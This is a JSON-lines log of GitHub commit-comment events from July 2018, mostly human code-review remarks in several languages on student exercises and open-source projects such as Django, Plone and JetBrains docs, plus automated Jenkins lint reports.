{"id":"7922761389","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-yokomizo/meikaiJAVA_yokomizo"},"payload":{"comment":{"id":29605393,"position":null,"line":null,"path":null,"commit_id":"0f99a64cbfd9b16ddcaae6cd03350da7a4d107ec","created_at":"2018-07-05T12:00:29Z","updated_at":"2018-07-05T12:00:29Z","author_association":"COLLABORATOR","body":"メンター 平澤からの指摘です。\r\n検証内容なのですが、全て以上を想定しており引数にも sMORE しか関数に設定されておりません。\r\n以下を想定して検証クラスを修正してみてください。また、検証した結果不要となった変数や関数については削除するようにして不要なソースが残らないようにして下さい。"}},"created_at":"2018-07-05T12:00:29Z"}
{"id":"7922761629","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29605394,"position":null,"line":null,"path":null,"commit_id":"010623c8c75ac35f9b737e527d37900edf8c426e","created_at":"2018-07-05T12:00:31Z","updated_at":"2018-07-05T12:00:31Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/29/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T12:00:31Z"}
{"id":"7922762512","type":"CommitCommentEvent","actor":{"login":"mutoe"},"repo":{"name":"zhiyicx/plus-component-h5"},"payload":{"comment":{"id":29605397,"position":22,"line":16,"path":"src/components/modules/question/QuestionAnswersItem.vue","commit_id":"06dd662157f5f6e774c1deab8e3aaef7ee897146","created_at":"2018-07-05T12:00:42Z","updated_at":"2018-07-05T12:00:42Z","author_association":"COLLABORATOR","body":"`.stop`修饰符防止触发外层click事件"}},"created_at":"2018-07-05T12:00:42Z"}
{"id":"7922767226","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29605409,"position":null,"line":null,"path":null,"commit_id":"4043ea9e269029594f0c76ce10aac06a0b8483f3","created_at":"2018-07-05T12:01:38Z","updated_at":"2018-07-05T12:01:38Z","author_association":"NONE","body":"ちょっと細かいですが、\r\nrateに(1 - 0.1)を代入しています。個人的にはこれは「割引率」というより\r\n「割り引いた結果の率」と思います。\r\n計算結果的にはOKです。\r\nあと、guitarがquitarになっています。"}},"created_at":"2018-07-05T12:01:38Z"}
{"id":"7922767620","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605410,"position":270,"line":170,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T12:01:43Z","updated_at":"2018-07-05T12:01:43Z","author_association":"NONE","body":"Не указан тип для $catName"}},"created_at":"2018-07-05T12:01:43Z"}
{"id":"7922768583","type":"CommitCommentEvent","actor":{"login":"rosscado"},"repo":{"name":"rosscado/sample-cloud-native-toolchain-tutorial-20180629133344888"},"payload":{"comment":{"id":29605412,"position":null,"line":null,"path":null,"commit_id":"c1ea1a98d883ed720d696b371afe4cc883134621","created_at":"2018-07-05T12:01:56Z","updated_at":"2018-07-05T12:01:56Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/1247f01c-bedc-4b1d-b07f-4a2fec5865a7?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180629133344888\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/9ea8d3b8-5d78-4284-8c83-9db4a53f12a1?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180629133344888\") deployed [sample-cloud-native-toolchain-tutorial-20180629133344888](https://github.com/rosscado/sample-cloud-native-toolchain-tutorial-20180629133344888/releases/tag/deploy-ibm-yp-eu-gb-deep-language-technology-prod-20180705-120154 \"deploy-ibm-yp-eu-gb-deep-language-technology-prod-20180705-120154\") to [prod](https://console.bluemix.net/apps/10e538ca-1ec5-405a-bc27-22ead21d8f77?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:deep-language-technology:prod\"), including this commit"}},"created_at":"2018-07-05T12:01:56Z"}
{"id":"7922769551","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29605415,"position":null,"line":null,"path":null,"commit_id":"3706e192d1ea8886e63532299076f9b1bc885db8","created_at":"2018-07-05T12:02:09Z","updated_at":"2018-07-05T12:02:09Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/30/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T12:02:09Z"}
{"id":"7922771252","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605420,"position":236,"line":153,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T12:02:31Z","updated_at":"2018-07-05T12:02:31Z","author_association":"NONE","body":"setCatName($catName); - Будет ошибка"}},"created_at":"2018-07-05T12:02:31Z"}
{"id":"7922774002","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":29605429,"position":60,"line":60,"path":"Products/Rider.md","commit_id":"2b5394f5250709899599cb34cb0dba5fdb776b88","created_at":"2018-07-05T12:03:09Z","updated_at":"2018-07-05T12:03:09Z","author_association":"MEMBER","body":"This can only be needed if the plugin declares its own extension points, which is normally not the case."}},"created_at":"2018-07-05T12:03:09Z"}
{"id":"7922775829","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":29605433,"position":59,"line":59,"path":"Products/Rider.md","commit_id":"2b5394f5250709899599cb34cb0dba5fdb776b88","created_at":"2018-07-05T12:03:31Z","updated_at":"2018-07-05T12:03:31Z","author_association":"MEMBER","body":"You probably should mention that this needs to be updated to match the current Rider version."}},"created_at":"2018-07-05T12:03:31Z"}
{"id":"7922778369","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"fieldOfView/PrepareStageCompactor"},"payload":{"comment":{"id":29605441,"position":null,"line":null,"path":null,"commit_id":"23d32313676ff02b0d1a2a38dbc6b755611026ea","created_at":"2018-07-05T12:04:04Z","updated_at":"2018-07-05T12:04:04Z","author_association":"OWNER","body":"Could you open an issue? Then I'll get to this when I have time."}},"created_at":"2018-07-05T12:04:04Z"}
{"id":"7922779242","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":29605446,"position":71,"line":71,"path":"Products/Rider.md","commit_id":"2b5394f5250709899599cb34cb0dba5fdb776b88","created_at":"2018-07-05T12:04:16Z","updated_at":"2018-07-05T12:04:16Z","author_association":"MEMBER","body":"`gradle-intellij-plugin` supports updating `idea-version` in plugin.xml, so that is not true."}},"created_at":"2018-07-05T12:04:16Z"}
{"id":"7922786499","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29605463,"position":818,"line":616,"path":"ariadne/src/Ariadne/Wallet/Backend/KeyStorage.hs","commit_id":"2874d25e31dadbbebcb65b23732397783aa05a18","created_at":"2018-07-05T12:05:50Z","updated_at":"2018-07-05T12:05:50Z","author_association":"MEMBER","body":"`eitherToThrow` from `Pos.Util.Util` does the same thing.\r\nI think it's better to use `eitherToThrow`, because it's used in a lot of places."}},"created_at":"2018-07-05T12:05:50Z"}
{"id":"7922789460","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18013/programming-term2"},"payload":{"comment":{"id":29605470,"position":null,"line":null,"path":null,"commit_id":"8bf2d1f79afc0619d8a2523aa0499feca7835370","created_at":"2018-07-05T12:06:27Z","updated_at":"2018-07-05T12:06:27Z","author_association":"NONE","body":"コミットメッセージが恐ろしく長いですね^^;\r\n何か問題でもありましたか?気軽に相談してくださいね。\r\n\r\nescape-seq.pyはコミットしてもらった内容でなく、指示ではp.43の中ほどの\r\n\"REPL\"の部分のコーディングをお願いしていました。\r\nバックスラッシュを用いて引用符の中で文字を表示する場面は結構出てくるので\r\n覚えておいてくださいね。\r\n\r\nhanaya-var.pyですが、この計算結果だと1割引でなく、値段を1割にしちゃった結果が\r\n出てしまい、出題の意図と異なってしまいます。\r\n時間があればでいいので、修正してみてください。"}},"created_at":"2018-07-05T12:06:27Z"}
{"id":"7922789703","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":29605471,"position":177,"line":177,"path":"Products/Rider.md","commit_id":"2b5394f5250709899599cb34cb0dba5fdb776b88","created_at":"2018-07-05T12:06:31Z","updated_at":"2018-07-05T12:06:31Z","author_association":"MEMBER","body":"Most plugins have only one model, so they don't need to declare their own `generateModel` task and can simply use the `rdgen` block."}},"created_at":"2018-07-05T12:06:31Z"}
{"id":"7922792449","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":29605480,"position":160,"line":160,"path":"Products/Rider.md","commit_id":"2b5394f5250709899599cb34cb0dba5fdb776b88","created_at":"2018-07-05T12:07:07Z","updated_at":"2018-07-05T12:07:07Z","author_association":"MEMBER","body":"A word is missing between \"to\" and \"a\""}},"created_at":"2018-07-05T12:07:07Z"}
{"id":"7922793804","type":"CommitCommentEvent","actor":{"login":"mostaphaRoudsari"},"repo":{"name":"ladybug-tools/ladybug"},"payload":{"comment":{"id":29605481,"position":27,"line":198,"path":"ladybug/epw.py","commit_id":"b4bbe490f5131747d88599d38d274939b05da187","created_at":"2018-07-05T12:07:25Z","updated_at":"2018-07-05T12:07:25Z","author_association":"MEMBER","body":"For hourly data we have to keep the timestamps identical as EnergyPlus does itself. You can change the timestamp for sub-hourly data as it is expected but here you are changing the logic for the whole library. I wish you had this in a separate commit so we could revert it if necessary. "}},"created_at":"2018-07-05T12:07:25Z"}
{"id":"7922793839","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605482,"position":10,"line":10,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T12:07:25Z","updated_at":"2018-07-05T12:07:25Z","author_association":"NONE","body":"maybe make these std::cin so one does not need to recompile to test different cases"}},"created_at":"2018-07-05T12:07:25Z"}
{"id":"7922794241","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605484,"position":11,"line":11,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T12:07:30Z","updated_at":"2018-07-05T12:07:30Z","author_association":"NONE","body":"maybe make these std::cin so one does not need to recompile to test different cases"}},"created_at":"2018-07-05T12:07:30Z"}
{"id":"7922794821","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":29605485,"position":151,"line":151,"path":"Products/Rider.md","commit_id":"2b5394f5250709899599cb34cb0dba5fdb776b88","created_at":"2018-07-05T12:07:37Z","updated_at":"2018-07-05T12:07:37Z","author_association":"MEMBER","body":"Change this to `MyEnum`?"}},"created_at":"2018-07-05T12:07:37Z"}
{"id":"7922795707","type":"CommitCommentEvent","actor":{"login":"timgraham"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29605487,"position":43,"line":64,"path":"django/db/models/functions/math.py","commit_id":"f6f8614b8fabc8138c9bc9763841e18ba7bf55f7","created_at":"2018-07-05T12:07:48Z","updated_at":"2018-07-05T12:07:48Z","author_association":"MEMBER","body":"Proposal:\r\n```\r\n# Cast integers to float to avoid inconsistent/buggy behavior if the\r\n# arguments are mixed between integer and float or decimal.\r\n```"}},"created_at":"2018-07-05T12:07:48Z"}
{"id":"7922796859","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29605490,"position":43,"line":44,"path":"ariadne/src/Ariadne/Wallet/Face.hs","commit_id":"2874d25e31dadbbebcb65b23732397783aa05a18","created_at":"2018-07-05T12:08:01Z","updated_at":"2018-07-05T12:08:01Z","author_association":"MEMBER","body":"Using `Word32` as UI index is confusing, it can be treated as derivation path. Most of the code uses `Word` for UI indices."}},"created_at":"2018-07-05T12:08:01Z"}
{"id":"7922801358","type":"CommitCommentEvent","actor":{"login":"Jasper-de-Beijer"},"repo":{"name":"Jasper-de-Beijer/newGitTest"},"payload":{"comment":{"id":29605498,"position":1,"line":1,"path":"README.md","commit_id":"7ec684436f34be438e95315cd0951661fdbb4829","created_at":"2018-07-05T12:08:59Z","updated_at":"2018-07-05T12:08:59Z","author_association":"OWNER","body":"comment test\r\n"}},"created_at":"2018-07-05T12:08:59Z"}
{"id":"7922801926","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18015/programming-term2"},"payload":{"comment":{"id":29605500,"position":null,"line":null,"path":null,"commit_id":"d4f7051f0f1817281b25755bc73da7d5f95085a6","created_at":"2018-07-05T12:09:07Z","updated_at":"2018-07-05T12:09:07Z","author_association":"NONE","body":"escape-seq.pyはコミットしてもらった内容でなく、指示ではp.43の中ほどの\r\n\"REPL\"の部分のコーディングをお願いしていました。\r\nバックスラッシュを用いて引用符の中で文字を表示する場面は結構出てくるので\r\n覚えておいてくださいね。\r\n\r\nhanaya-var.py\r\n実行してみましたか?これではエラーで動かないと思います。\r\n火曜日の講義までに修正してみてください。\r\nプログラムは動いて意味があります。"}},"created_at":"2018-07-05T12:09:07Z"}
{"id":"7922805308","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605505,"position":24,"line":84,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"3101145ce6d50b8b1dee0f4d4541edc2425cc311","created_at":"2018-07-05T12:09:50Z","updated_at":"2018-07-05T12:09:50Z","author_association":"NONE","body":"try see if its faster with a really large attribute divisor and an attrBuf of 4 bytes."}},"created_at":"2018-07-05T12:09:50Z"}
{"id":"7922807539","type":"CommitCommentEvent","actor":{"login":"ddt-sawa"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29605511,"position":null,"line":null,"path":null,"commit_id":"16431d736e94f34fced05cb94b3d656ab7b2e75b","created_at":"2018-07-05T12:10:18Z","updated_at":"2018-07-05T12:10:18Z","author_association":"OWNER","body":"恐らくクリーンをしていなかったため、変数名修正前の実行プログラムで動作確認をしてしまっていたものと思われます。申し訳ございませんでした。"}},"created_at":"2018-07-05T12:10:18Z"}
{"id":"7922808020","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605512,"position":28,"line":88,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"3101145ce6d50b8b1dee0f4d4541edc2425cc311","created_at":"2018-07-05T12:10:25Z","updated_at":"2018-07-05T12:10:25Z","author_association":"NONE","body":"would be nice to vary the instance count and vertex count."}},"created_at":"2018-07-05T12:10:25Z"}
{"id":"7922811333","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29605521,"position":null,"line":null,"path":null,"commit_id":"07ddca55e6f1804cfba4fdd770f28bc893da4399","created_at":"2018-07-05T12:11:09Z","updated_at":"2018-07-05T12:11:09Z","author_association":"NONE","body":"hanaya-var.pyですが、この計算結果だと1割引でなく、値段を1割にしちゃった結果が\r\n出てしまい、出題の意図と異なってしまいます。\r\n時間があればでいいので、修正してみてください。"}},"created_at":"2018-07-05T12:11:09Z"}
{"id":"7922811524","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29605522,"position":65,"line":104,"path":"src/broadcast.rs","commit_id":"f45e1997f7febd8bd27f2c7b237d161e904aca0d","created_at":"2018-07-05T12:11:11Z","updated_at":"2018-07-05T12:11:11Z","author_association":"CONTRIBUTOR","body":"\"was scheduled\"?"}},"created_at":"2018-07-05T12:11:11Z"}
{"id":"7922812689","type":"CommitCommentEvent","actor":{"login":"G-i-t-H-ub"},"repo":{"name":"G-i-t-H-ub/Library-Open"},"payload":{"comment":{"id":29605526,"position":3,"line":3,"path":"example.txt","commit_id":"b5fcad673cc38556265b929397a2e37bc5a1cf4c","created_at":"2018-07-05T12:11:25Z","updated_at":"2018-07-05T12:11:25Z","author_association":"OWNER","body":"this is terrible"}},"created_at":"2018-07-05T12:11:25Z"}
{"id":"7922813268","type":"CommitCommentEvent","actor":{"login":"Thrumbar"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":29605529,"position":null,"line":null,"path":null,"commit_id":"5f22905a31bc326c9ed987ad0fe36a510f65fd75","created_at":"2018-07-05T12:11:32Z","updated_at":"2018-07-05T12:11:32Z","author_association":"CONTRIBUTOR","body":"Blizzard_AdventureMapInset.lua\r\nhttps://www.townlong-yak.com/framexml/26095/Blizzard_AdventureMap/Blizzard_AdventureMapInset.lua\r\n\r\n3  local TILE_WIDTH = 256;\r\n4  local TILE_HEIGHT = 256;\r\n5  local TILE_SCALE = .75;\r\n6  local EFFECTIVE_TILE_WIDTH = TILE_WIDTH * TILE_SCALE;\r\n7  local EFFECTIVE_TILE_HEIGHT = TILE_HEIGHT * TILE_SCALE;\r\n8  local WIDTH_INSET = 22 * TILE_SCALE;\r\n9  local HEIGHT_INSET = 100 * TILE_SCALE;\r\n10  local TILES_PER_ROW = 4;\r\n\r\nThis something you looking for ??"}},"created_at":"2018-07-05T12:11:32Z"}
{"id":"7922813298","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605531,"position":48,"line":105,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"3101145ce6d50b8b1dee0f4d4541edc2425cc311","created_at":"2018-07-05T12:11:33Z","updated_at":"2018-07-05T12:11:33Z","author_association":"NONE","body":"don't do this outside the main render loop"}},"created_at":"2018-07-05T12:11:33Z"}
{"id":"7922813651","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605532,"position":54,"line":109,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"3101145ce6d50b8b1dee0f4d4541edc2425cc311","created_at":"2018-07-05T12:11:37Z","updated_at":"2018-07-05T12:11:37Z","author_association":"NONE","body":"don't do this outside the main render loop"}},"created_at":"2018-07-05T12:11:37Z"}
{"id":"7922815977","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29605534,"position":null,"line":null,"path":null,"commit_id":"74a0b09f5aadf03b0175dbe43d67e5bf4791b941","created_at":"2018-07-05T12:12:08Z","updated_at":"2018-07-05T12:12:08Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://752b6568.ngrok.io/ui#review:id=370)"}},"created_at":"2018-07-05T12:12:08Z"}
{"id":"7922816387","type":"CommitCommentEvent","actor":{"login":"pope1ni"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29605535,"position":43,"line":64,"path":"django/db/models/functions/math.py","commit_id":"f6f8614b8fabc8138c9bc9763841e18ba7bf55f7","created_at":"2018-07-05T12:12:13Z","updated_at":"2018-07-05T12:12:13Z","author_association":"CONTRIBUTOR","body":"Sounds good."}},"created_at":"2018-07-05T12:12:13Z"}
